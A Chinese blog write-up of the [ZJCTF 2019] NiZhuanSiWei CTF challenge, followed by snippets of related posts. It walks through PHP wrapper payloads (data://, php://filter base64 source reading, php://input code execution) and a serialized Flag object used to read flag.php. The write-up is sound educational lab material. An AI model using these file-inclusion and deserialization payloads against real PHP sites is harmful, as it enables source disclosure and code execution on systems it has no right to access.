NiZhuanSiWei(php伪协议)

最新推荐文章于 2024-01-29 21:34:49 发布
最新推荐文章于 2024-01-29 21:34:49 发布
阅读量453 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52138890/article/details/120276214
版权

NiZhuanSiWei

在这里插入图片描述

在这里插入图片描述

看代码,有三个参数,即text,file,password。看满足条件:

  • text不为空,且 file_get_contents() 读取的返回值为 welcome to the zjctf,file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没有一个文件,而是读取的text变量。直接给text赋值 text=welcome to the zjctf 的话,没有回显说明没成功。很明显,需要用伪协议绕过,可以用php://input和data://伪协议,这里使用data://,构造:?text=data://text/plain,welcome to the zjctf

    data://伪协议:
条件:allow_url_fopen:on
     allow_url_include :on
作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
用法:data://text/plain,
     data://text/plain;base64,
示例:http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

  • 看第二个if:首先是file不能有flag字符。提示了有一个 useless.php ,用PHP伪协议中的php://filter读取文件,构造file=php://filter/read=convert.base64-encode/resource=useless.php

    php://伪协议
条件:allow_url_fopen:off/on
     allow_url_include :仅php://input php://stdin php://memory php://temp 需要on
作用:php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。
用法:1.php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)。
     2.php://input + [POST DATA]执行php代码(用bp或HackBar)
     实例:http://127.0.0.1/include.php?file=php://input
     [POST DATA部分]
     <?php phpinfo(); ?>

回到题目,最后构造出:?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P7qXt1yw-1631540338537)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210911141700231.png)]

进行解码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PBkbFcDs-1631540338538)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210911141754269.png)]

看到有一个 flag.php ,并且file不为空,将读取flag.php并显示。所以。构造一个序列化字符串。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p12yQ4Ro-1631540338539)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210911141904515.png)]

最后payload为:?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";},这里要注意如果file继续用前面伪协议读取的话,后面的 password 会无回显无法得到flag 。需修改为 useless.php。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1RIBg8TJ-1631540338540)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210911142026019.png)]
ess.php。

[外链图片转存中…(img-1RIBg8TJ-1631540338540)]

m0_52138890
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3876
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2594
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 335
这是一道简单的web题涉及data://协议php协议和反序列化的简单应用。
魔术方法总结
梦里不知身是客
12-26 9836
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,协议,文件包含,反序列化)
最新发布
weixin_66112047的博客
01-29 402
构造序列化去覆盖,获取flag
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php协议+序列化与反序列化)
m0_55854679的博客
08-23 1902
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
CTF刷题
qq_63785498的博客
04-21 385
刷题笔记
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1091
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
[原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP协议、数组绕过)
笑花大王
03-03 706
简介 原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:反序列化、PHP协议、数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 打开页面看到源码先审计 大致分析flag在f...
BUUCTF_ZJCTF2019_NiZhuanSiWei
qq_45628145的博客
05-03 603
NiZhuanSiWei 进入题目,直接给出了php源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ ...
攻防世界 web nizhuansiwei
liuxiaohuai_的博客
03-28 216
这个题就是代码审计题 : <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&gt
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3124
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1214
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
web-[ZJCTF 2019]NiZhuanSiWei
wojiushilsy的博客
05-15 311
题目要点题目内容解题第一个绕过:第二个绕过第三个绕过 题目要点 php协议 data://text/plain,编码(base64),内容 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 resource=<要过滤的数据流> 这个参数是必须的。它.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值